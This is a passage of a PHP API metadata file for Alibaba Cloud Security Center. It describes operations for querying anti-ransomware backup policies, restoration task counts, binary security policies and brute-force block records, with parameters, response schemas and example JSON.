values:'."\n" ."\n" .'- **NotUpgraded**: Not upgraded.'."\n" .'- **Upgrading**: Upgrading.'."\n" .'- **UpgradeFailed**: Upgrade failed.'."\n" .'- **UpgradeSuccess**: Upgrade succeeded.', 'type' => 'string', 'example' => 'Upgrading', 'title' => ''], 'ServiceErrorCount' => ['description' => 'The number of servers with data backup exceptions.', 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], 'PolicyRegionId' => ['description' => 'The region ID of the backup service selected when installing the anti-ransomware client on non-Alibaba Cloud servers.', 'type' => 'string', 'example' => 'ch-hangzhou', 'title' => ''], 'ClientStatus' => ['description' => 'The status of the anti-ransomware client. Valid values:'."\n" ."\n" .'- **running**: Normal.'."\n" ."\n" .'- **exception**: Abnormal.', 'type' => 'string', 'example' => 'running', 'title' => ''], 'Name' => ['description' => 'The name of the anti-ransomware protection policy.', 'type' => 'string', 'example' => 'SecurityStrategy-20200303', 'title' => ''], 'HealthClientCount' => ['description' => 'The number of clients in the normal state.', 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], 'Id' => ['description' => 'The ID of the anti-ransomware protection policy.', 'type' => 'integer', 'format' => 'int64', 'example' => '11', 'title' => ''], 'ClientErrorUuidList' => [ 'description' => 'The UUID list of clients in the **abnormal** state.', 'type' => 'array', 'items' => ['description' => 'The UUID list of clients in the **abnormal** state.', 'type' => 'string', 'example' => '["3bb30859-b3b5-4f28-868f-b0892c98****","3bb30859-b3b5-4f28-868f-b0892c98****"]', 'title' => ''], 'title' => '', 'example' => '', ], 'RemarkedUuidList' => [ 'description' => 'The UUID list of servers returned after retrieval by the MachineRemark request parameter.', 'type' => 'array', 'items' => ['description' => 'The UUID list of servers returned after retrieval by the MachineRemark request parameter.', 'type' => 'string', 'example' => '["3bb30859-b3b5-4f28-868f-b0892c98****","3bb30859-b3b5-4f28-868f-b0892c98****"]', 'title' => ''], 'title' => '', 'example' => '', ], 'UuidList' => [ 'description' => 'The UUID list of servers protected by the anti-ransomware protection policy.', 'type' => 'array', 'items' => ['description' => 'The UUID list of servers protected by the anti-ransomware protection policy.', 'type' => 'string', 'example' => '["3bb30859-b3b5-4f28-868f-b0892c98****","3bb30859-b3b5-4f28-868f-b0892c98****"]', 'title' => ''], 'title' => '', 'example' => '', ], 'ServiceErrorUuidList' => [ 'description' => 'The UUID list of servers with data backup exceptions.', 'type' => 'array', 'items' => ['description' => 'The UUID list of servers with data backup exceptions.', 'type' => 'string', 'example' => '["3bb30859-b3b5-4f28-868f-b0892c98****","3bb30859-b3b5-4f28-868f-b0892c98****"]', 'title' => ''], 'title' => '', 'example' => '', ], 'HealthClientUuidList' => [ 'description' => 'The UUID list of clients in the **healthy** state.', 'type' => 'array', 'items' => ['description' => 'The UUID list of clients in the **healthy** state.', 'type' => 'string', 'example' => '["3bb30859-b3b5-4f28-868f-b0892c98****","3bb30859-b3b5-4f28-868f-b0892c98****"]', 'title' => ''], 'title' => '', 'example' => '', ], 'ServerType' => ['description' => 'The server type. Valid values:'."\n" ."\n" .'- **OUT_CLOUD**: Non-Alibaba Cloud server.'."\n" .'- **ALIYUN**: Alibaba Cloud server.'."\n" .'- **TRIPARTITE**: Simple Application Server.', 'type' => 'string', 'example' => 'OUT_CLOUD', 'title' => ''], 'LastStatusSyncTime' => ['description' => 'The latest update time of the anti-ransomware protection policy status, in milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1719488535027', 'title' => ''], 'PreStatus' => ['description' => 'The previous status of the anti-ransomware protection policy.'."\n" ."\n" .'- **enabled**: The policy is manually enabled.'."\n" ."\n" .'- **disabled**: The policy is manually disabled. After the policy is disabled, running backup tasks will stop.'."\n" ."\n" .'- **closed**: The anti-ransomware capacity is exceeded, and the system disables the policy.', 'type' => 'string', 'example' => 'disabled', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query Backup Policy List', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeBackupPolicies'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:DescribeBackupPolicies', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"BE120DAB-F4E7-4C53-ADC3-A97578ABF384\\",\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 10,\\n \\"TotalCount\\": 30,\\n \\"Count\\": 3\\n },\\n \\"Policies\\": [\\n {\\n \\"ClientErrorCount\\": 2,\\n \\"Status\\": \\"enabled\\",\\n \\"PolicyVersion\\": \\"2.0.0\\",\\n \\"Policy\\": \\"{\\\\\\"Exclude\\\\\\":[\\\\\\"/bin/\\\\\\",\\\\\\"/usr/bin/\\\\\\",\\\\\\"/sbin/\\\\\\",\\\\\\"/boot/\\\\\\",\\\\\\"/proc/\\\\\\",\\\\\\"/sys/\\\\\\",\\\\\\"/srv/\\\\\\",\\\\\\"/lib/\\\\\\",\\\\\\"/selinux/\\\\\\",\\\\\\"/usr/sbin/\\\\\\",\\\\\\"/run/\\\\\\",\\\\\\"/lib32/\\\\\\",\\\\\\"/lib64/\\\\\\",\\\\\\"/lost+found/\\\\\\",\\\\\\"/var/lib/kubelet/\\\\\\",\\\\\\"/var/lib/ntp/proc\\\\\\",\\\\\\"/var/lib/container\\\\\\",\\\\\\"Windows\\\\\\\\\\\\\\\\\\\\\\",\\\\\\"Python27\\\\\\\\\\\\\\\\\\\\\\",\\\\\\"Program Files (x86)\\\\\\\\\\\\\\\\\\\\\\",\\\\\\"Program Files\\\\\\\\\\\\\\\\\\\\\\",\\\\\\"Boot\\\\\\\\\\\\\\\\\\\\\\",\\\\\\"$RECYCLE.BIN\\\\\\",\\\\\\"System Volume Information\\\\\\\\\\\\\\\\\\\\\\",\\\\\\"Users\\\\\\\\\\\\\\\\Administrator\\\\\\\\\\\\\\\\NTUSER.DAT*\\\\\\",\\\\\\"ProgramData\\\\\\\\\\\\\\\\\\\\\\",\\\\\\"pagefile.sys\\\\\\",\\\\\\"Users\\\\\\\\\\\\\\\\Default\\\\\\\\\\\\\\\\NTUSER.DAT*\\\\\\",\\\\\\"Users\\\\\\\\\\\\\\\\Administrator\\\\\\\\\\\\\\\\ntuser.*\\\\\\"],\\\\\\"ExcludeSystemPath\\\\\\":true,\\\\\\"Include\\\\\\":[],\\\\\\"IsDefault\\\\\\":1,\\\\\\"Retention\\\\\\":7,\\\\\\"Schedule\\\\\\":\\\\\\"I|1630689360|PT24H\\\\\\",\\\\\\"Source\\\\\\":[],\\\\\\"SpeedLimiter\\\\\\":\\\\\\"\\\\\\",\\\\\\"UseVss\\\\\\":true}\\",\\n \\"UpgradeStatus\\": \\"Upgrading\\",\\n \\"ServiceErrorCount\\": 2,\\n \\"PolicyRegionId\\": \\"ch-hangzhou\\",\\n \\"ClientStatus\\": \\"running\\",\\n \\"Name\\": \\"SecurityStrategy-20200303\\",\\n \\"HealthClientCount\\": 2,\\n \\"Id\\": 11,\\n \\"ClientErrorUuidList\\": [\\n \\"[\\\\\\"3bb30859-b3b5-4f28-868f-b0892c98****\\\\\\",\\\\\\"3bb30859-b3b5-4f28-868f-b0892c98****\\\\\\"]\\"\\n ],\\n \\"RemarkedUuidList\\": [\\n \\"[\\\\\\"3bb30859-b3b5-4f28-868f-b0892c98****\\\\\\",\\\\\\"3bb30859-b3b5-4f28-868f-b0892c98****\\\\\\"]\\"\\n ],\\n \\"UuidList\\": [\\n \\"[\\\\\\"3bb30859-b3b5-4f28-868f-b0892c98****\\\\\\",\\\\\\"3bb30859-b3b5-4f28-868f-b0892c98****\\\\\\"]\\"\\n ],\\n \\"ServiceErrorUuidList\\": [\\n \\"[\\\\\\"3bb30859-b3b5-4f28-868f-b0892c98****\\\\\\",\\\\\\"3bb30859-b3b5-4f28-868f-b0892c98****\\\\\\"]\\"\\n ],\\n \\"HealthClientUuidList\\": [\\n \\"[\\\\\\"3bb30859-b3b5-4f28-868f-b0892c98****\\\\\\",\\\\\\"3bb30859-b3b5-4f28-868f-b0892c98****\\\\\\"]\\"\\n ],\\n \\"ServerType\\": \\"OUT_CLOUD\\",\\n \\"LastStatusSyncTime\\": 1719488535027,\\n \\"PreStatus\\": \\"disabled\\"\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeBackupPolicy' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas7JO011'], ], 'parameters' => [ [ 'name' => 'Id', 'in' => 'query', 'schema' => ['description' => 'The ID of the anti-ransomware backup policy.'."\n" .'>You can call the [DescribeBackupPolicies](~~DescribeBackupPolicies~~) operation to obtain this parameter.', 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '51880', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'description' => 'The policy details.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. It is a unique identifier generated by Alibaba Cloud for the request and can be used for troubleshooting.', 'type' => 'string', 'example' => 'A4EB8B1C-1DEC-5E18-BCD0-D1BBB3936FA7', 'title' => ''], 'BackupPolicyDetail' => [ 'description' => 'The details of the policy.', 'type' => 'object', 'properties' => [ 'Status' => ['description' => 'The status of the anti-ransomware protection policy. Valid values:'."\n" ."\n" .'- **enabled**: The policy is manually enabled.'."\n" ."\n" .'- **disabled**: The policy is manually disabled. After the policy is disabled, running backup tasks are stopped.'."\n" ."\n" .'- **closed**: The policy is disabled by the system because the anti-ransomware capacity is exceeded.', 'type' => 'string', 'example' => 'closed', 'title' => ''], 'PolicyVersion' => ['description' => 'The version of the protection policy. Valid values:'."\n" ."\n" .'- **1.0.0**'."\n" .'- **2.0.0**', 'type' => 'string', 'example' => '2.0.0', 'title' => ''], 'Policy' => ['description' => 'The content of the anti-ransomware protection policy. This parameter is in JSON format. The following fields are included:'."\n" ."\n" .'- **IsDefault**: The type of the protection policy. Valid values:'."\n" .' - **1**: recommended policy'."\n" .' - **0**: custom policy'."\n" .'- **Include**: The file types to protect. If all file types are protected, this parameter is set to [].'."\n" .'- **Source**: The server folders to protect. If all folders are protected, this parameter is set to [].'."\n" .'- **ExcludeSystemPath**: Specifies whether to exclude specified folders. Set this parameter to **true** to exclude folders. If no folders need to be excluded, you do not need to configure this parameter.'."\n" .'- **Exclude**: The specified protection folder addresses. If no specific protection folder addresses are configured, this parameter is set to [].'."\n" .'- **Schedule**: Settings for the execution time and interval of the data backup task. Specify an off-peak hour that is not on the hour. Examples:'."\n" .' - Example 1: I|1583216092|P21D indicates that the data backup starts at 2020-03-03 14:14:52 and the backup policy executes at an interval of 3 weeks.'."\n" .' - Example 2: I|1583216092|PT24H indicates that the data backup starts at 2020-03-03 14:14:52 and the backup policy executes at an interval of 24 hours.'."\n" .'- **Retention**: Settings for the retention period of backup data, in days. 7 indicates 1 week, 365 indicates 1 year, and -1 indicates permanent retention.'."\n" .'- **SpeedLimiter**: Settings for the backup network bandwidth throttling. For example, 0:24:30720 indicates that the backup network bandwidth throttling is 30 MB/s from 00:00 to 24:00.'."\n" .'- **UseVss**: Specifies whether to enable the Volume Shadow Copy Service (VSS) feature for Windows. Valid values:'."\n" .' - **true**: enabled'."\n" .' - **false**: not enabled'."\n" ."\n" .'> The VSS feature is available only for Windows systems. After this feature is enabled, it effectively reduces the issue of individual file backup failures caused by process occupation. Enable this feature. After this feature is enabled, file backup for exFAT and FAT32 disk formats is not supported.', 'type' => 'string', 'example' => '{'."\n" .' "Exclude": ['."\n" .' "/bin/",'."\n" .' "/usr/bin/",'."\n" .' "/sbin/",'."\n" .' "/boot/",'."\n" .' "/proc/",'."\n" .' "/sys/",'."\n" .' "/srv/",'."\n" .' "/lib/",'."\n" .' "/selinux/",'."\n" .' "/usr/sbin/",'."\n" .' "/run/",'."\n" .' "/lib32/",'."\n" .' "/lib64/",'."\n" .' "/lost+found/",'."\n" .' "/var/lib/kubelet/",'."\n" .' "/var/lib/ntp/proc",'."\n" .' "/var/lib/container",'."\n" .' "Windows\\\\",'."\n" .' "Python27\\\\",'."\n" .' "Program Files (x86)\\\\",'."\n" .' "Program Files\\\\",'."\n" .' "Boot\\\\",'."\n" .' "$RECYCLE.BIN",'."\n" .' "System Volume Information\\\\",'."\n" .' "Users\\\\Administrator\\\\NTUSER.DAT*",'."\n" .' "ProgramData\\\\",'."\n" .' "pagefile.sys",'."\n" .' "Users\\\\Default\\\\NTUSER.DAT*",'."\n" .' "Users\\\\Administrator\\\\ntuser.*"'."\n" .' ],'."\n" .' "ExcludeSystemPath": true,'."\n" .' "Include": [],'."\n" .' "IsDefault": 1,'."\n" .' "Retention": 7,'."\n" .' "Schedule": "I|1630689360|PT24H",'."\n" .' "Source": [],'."\n" .' "SpeedLimiter": "",'."\n" .' "UseVss": true'."\n" .'}', 'title' => ''], 'ClientStatus' => ['description' => 'The status of the anti-ransomware client. Valid values:'."\n" ."\n" .'- **running**: Normal.'."\n" ."\n" .'- **exception**: Abnormal.', 'type' => 'string', 'example' => 'running', 'title' => ''], 'Name' => ['description' => 'The policy name.', 'type' => 'string', 'example' => 'testBuckUp', 'title' => ''], 'Id' => ['description' => 'The ID of the anti-ransomware backup policy.', 'type' => 'integer', 'format' => 'int64', 'example' => '51880', 'title' => ''], 'RegionId' => ['description' => 'The region ID of the backup service.', 'type' => 'string', 'example' => 'cn-beijing', 'title' => ''], 'UuidList' => [ 'description' => 'The UUIDs of the servers for which the backup policy is enabled.', 'type' => 'array', 'items' => ['description' => 'The UUID of the server for which the backup policy is enabled.', 'type' => 'string', 'example' => 'inet-49611a6b-a98a-455d-a18a-92af9265****', 'title' => ''], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query anti-ransomware protection policy details for servers', 'summary' => 'Queries the details of an anti-ransomware protection policy for servers.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeBackupPolicy'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeBackupPolicy', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'BackupPolicy', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:backuppolicy/{#BackupPolicyId}'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"A4EB8B1C-1DEC-5E18-BCD0-D1BBB3936FA7\\",\\n \\"BackupPolicyDetail\\": {\\n \\"Status\\": \\"closed\\",\\n \\"PolicyVersion\\": \\"2.0.0\\",\\n \\"Policy\\": \\"{\\\\n \\\\\\"Exclude\\\\\\": [\\\\n \\\\\\"/bin/\\\\\\",\\\\n \\\\\\"/usr/bin/\\\\\\",\\\\n \\\\\\"/sbin/\\\\\\",\\\\n \\\\\\"/boot/\\\\\\",\\\\n \\\\\\"/proc/\\\\\\",\\\\n \\\\\\"/sys/\\\\\\",\\\\n \\\\\\"/srv/\\\\\\",\\\\n \\\\\\"/lib/\\\\\\",\\\\n \\\\\\"/selinux/\\\\\\",\\\\n \\\\\\"/usr/sbin/\\\\\\",\\\\n \\\\\\"/run/\\\\\\",\\\\n \\\\\\"/lib32/\\\\\\",\\\\n \\\\\\"/lib64/\\\\\\",\\\\n \\\\\\"/lost+found/\\\\\\",\\\\n \\\\\\"/var/lib/kubelet/\\\\\\",\\\\n \\\\\\"/var/lib/ntp/proc\\\\\\",\\\\n \\\\\\"/var/lib/container\\\\\\",\\\\n \\\\\\"Windows\\\\\\\\\\\\\\\\\\\\\\",\\\\n \\\\\\"Python27\\\\\\\\\\\\\\\\\\\\\\",\\\\n \\\\\\"Program Files (x86)\\\\\\\\\\\\\\\\\\\\\\",\\\\n \\\\\\"Program Files\\\\\\\\\\\\\\\\\\\\\\",\\\\n \\\\\\"Boot\\\\\\\\\\\\\\\\\\\\\\",\\\\n \\\\\\"$RECYCLE.BIN\\\\\\",\\\\n \\\\\\"System Volume Information\\\\\\\\\\\\\\\\\\\\\\",\\\\n \\\\\\"Users\\\\\\\\\\\\\\\\Administrator\\\\\\\\\\\\\\\\NTUSER.DAT*\\\\\\",\\\\n \\\\\\"ProgramData\\\\\\\\\\\\\\\\\\\\\\",\\\\n \\\\\\"pagefile.sys\\\\\\",\\\\n \\\\\\"Users\\\\\\\\\\\\\\\\Default\\\\\\\\\\\\\\\\NTUSER.DAT*\\\\\\",\\\\n \\\\\\"Users\\\\\\\\\\\\\\\\Administrator\\\\\\\\\\\\\\\\ntuser.*\\\\\\"\\\\n ],\\\\n \\\\\\"ExcludeSystemPath\\\\\\": true,\\\\n \\\\\\"Include\\\\\\": [],\\\\n \\\\\\"IsDefault\\\\\\": 1,\\\\n \\\\\\"Retention\\\\\\": 7,\\\\n \\\\\\"Schedule\\\\\\": \\\\\\"I|1630689360|PT24H\\\\\\",\\\\n \\\\\\"Source\\\\\\": [],\\\\n \\\\\\"SpeedLimiter\\\\\\": \\\\\\"\\\\\\",\\\\n \\\\\\"UseVss\\\\\\": true\\\\n}\\",\\n \\"ClientStatus\\": \\"running\\",\\n \\"Name\\": \\"testBuckUp\\",\\n \\"Id\\": 51880,\\n \\"RegionId\\": \\"cn-beijing\\",\\n \\"UuidList\\": [\\n \\"inet-49611a6b-a98a-455d-a18a-92af9265****\\"\\n ]\\n }\\n}","type":"json"}]', ], 'DescribeBackupRestoreCount' => [ 'summary' => 'Queries data of anti-ransomware restoration tasks.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => ['operationType' => 'get'], 'parameters' => [], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request. The ID is a unique identifier that Alibaba Cloud generates for the request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => 'ECC6B3E3-D496-512D-B46D-E6996A6B63EE', 'title' => ''], 'BackupRestoreCount' => [ 'description' => 'The statistics of anti-ransomware restoration tasks.', 'type' => 'object', 'properties' => [ 'Total' => ['description' => 'The total number of restoration tasks that have been created.', 'type' => 'integer', 'format' => 'int32', 'example' => '30', 'title' => ''], 'Recovering' => ['description' => 'The number of tasks in the **Restoring** state.', 'type' => 'integer', 'format' => 'int32', 'example' => '3', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query anti-ransomware restoration tasks', 'description' => 'If you have created anti-ransomware restoration tasks, you can call this operation to query the number of anti-ransomware restoration tasks in the **Restored** and **Restoring** states.', 'requestParamsDescription' => ' ', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeBackupRestoreCount'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeBackupRestoreCount', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"ECC6B3E3-D496-512D-B46D-E6996A6B63EE\\",\\n \\"BackupRestoreCount\\": {\\n \\"Total\\": 30,\\n \\"Recovering\\": 3\\n }\\n}","type":"json"}]', ], 'DescribeBinarySecurityPolicies' => [ 'summary' => 'Queries binary security policies.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The source IP address.'."\n", 'type' => 'string', 'required' => false, 'example' => '59.82.XXX.XXX', 'title' => ''], ], [ 'name' => 'Name', 'in' => 'query', 'schema' => ['description' => 'The name of the policy.'."\n", 'type' => 'string', 'required' => false, 'example' => 'policy-auto-5patxz', 'title' => ''], ], [ 'name' => 'Status', 'in' => 'query', 'schema' => ['description' => 'The status of the policy. Valid values:'."\n" ."\n" .'* **enabled**'."\n" .'* **disabled**'."\n", 'type' => 'string', 'required' => false, 'example' => 'enabled', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of entries per page.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => '1EE7B150-D67E-53FD-A52D-3E8E669A****', 'title' => ''], 'PageInfo' => [ 'description' => 'The pagination information.'."\n", 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The number of entries per page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries returned.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '218', 'title' => ''], 'Count' => ['description' => 'The number of entries returned on each page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], ], 'title' => '', 'example' => '', ], 'BinarySecurityPolicies' => [ 'description' => 'The information about security policies.'."\n", 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'Status' => ['description' => 'The status of the policy. Valid values:'."\n" ."\n" .'* **enabled**'."\n" .'* **disabled**'."\n", 'type' => 'string', 'example' => 'enabled', 'title' => ''], 'Policy' => ['description' => 'The content of the policy. The value is in the JSON format. A key supports the following values:'."\n" ."\n" .'* **policyMode**: the type of the policy. Default value: requireAttestor.'."\n" .'* **requiredAttestors**: the required witnesses.'."\n", 'type' => 'string', 'example' => '{\\"PolicyMode\\":\\"requireAttestor\\",\\"RequiredAttestors\\":[\\"test-xcs-04-11-hhht\\"]}', 'title' => ''], 'Name' => ['description' => 'The name of the policy.'."\n", 'type' => 'string', 'example' => 'logtail', 'title' => ''], 'Remark' => ['description' => 'The description.'."\n", 'type' => 'string', 'example' => 'test', 'title' => ''], 'Clusters' => [ 'description' => 'The information about clusters.'."\n", 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'ClusterId' => ['description' => 'The ID of the cluster.'."\n", 'type' => 'string', 'example' => 'c316702acdf5f45e1a9dc7fc52f21****', 'title' => ''], 'Namespaces' => [ 'description' => 'The namespaces.'."\n", 'type' => 'array', 'items' => ['description' => 'The namespace.'."\n", 'type' => 'string', 'example' => '[\\"insightone_x86\\"]', 'title' => ''], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'DescribeBinarySecurityPolicies', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeBinarySecurityPolicies'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeBinarySecurityPolicies', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"1EE7B150-D67E-53FD-A52D-3E8E669A****\\",\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 218,\\n \\"Count\\": 20\\n },\\n \\"BinarySecurityPolicies\\": [\\n {\\n \\"Status\\": \\"enabled\\",\\n \\"Policy\\": \\"{\\\\\\\\\\\\\\"PolicyMode\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"requireAttestor\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"RequiredAttestors\\\\\\\\\\\\\\":[\\\\\\\\\\\\\\"test-xcs-04-11-hhht\\\\\\\\\\\\\\"]}\\",\\n \\"Name\\": \\"logtail\\",\\n \\"Remark\\": \\"test\\",\\n \\"Clusters\\": [\\n {\\n \\"ClusterId\\": \\"c316702acdf5f45e1a9dc7fc52f21****\\",\\n \\"Namespaces\\": [\\n \\"[\\\\\\\\\\\\\\"insightone_x86\\\\\\\\\\\\\\"]\\"\\n ]\\n }\\n ]\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeBruteForceRecords' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'list', 'abilityTreeCode' => '92010', 'abilityTreeNodes' => ['FEATUREsas2XWKXT'], ], 'parameters' => [ [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The number of the page to return.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'Status', 'in' => 'query', 'schema' => ['description' => 'The status of the defense rule. Valid values:'."\n" ."\n" .'* **0**: invalid'."\n" .'* **1**: enabled'."\n" .'* **2**: failed'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'BlockIp', 'in' => 'query', 'schema' => ['description' => 'The IP address that is blocked.'."\n", 'type' => 'string', 'required' => false, 'example' => '175.106.XX.XX', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of entries to return on each page. Default value: 20. If you leave this parameter empty, 20 entries are returned on each page. We recommend that you do not leave this parameter empty.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], [ 'name' => 'InstanceId', 'in' => 'query', 'schema' => ['type' => 'string', 'required' => false, 'description' => 'The ID of the server.', 'example' => 'i-bp1fu4aqltf1huhc****', 'title' => ''], ], [ 'name' => 'Remark', 'in' => 'query', 'schema' => ['type' => 'string', 'required' => false, 'description' => 'The name or IP address of the server to query.', 'example' => '222.185.XX.XX', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'description' => 'The data returned.'."\n", 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => '7E0618A9-D5EF-4220-9471-C42B5E92719F', 'title' => ''], 'PageInfo' => [ 'description' => 'The pagination information.'."\n", 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the returned page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The number of entries returned per page. Default value: **20**.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries returned.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '263', 'title' => ''], 'Count' => ['description' => 'The number of entries returned on the current page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], ], 'title' => '', 'example' => '', ], 'MachineList' => [ 'description' => 'The IP addresses.'."\n", 'type' => 'array', 'items' => [ 'description' => 'The information about the IP address.'."\n", 'type' => 'object', 'properties' => [ 'Status' => ['description' => 'The status of the defense rule. Valid values:'."\n" ."\n" .'* **0**: invalid'."\n" .'* **1**: enabled'."\n" .'* **2**: failed'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], 'BlockExpireDate' => ['description' => 'The timestamp when the block action on the IP address becomes invalid.'."\n", 'type' => 'integer', 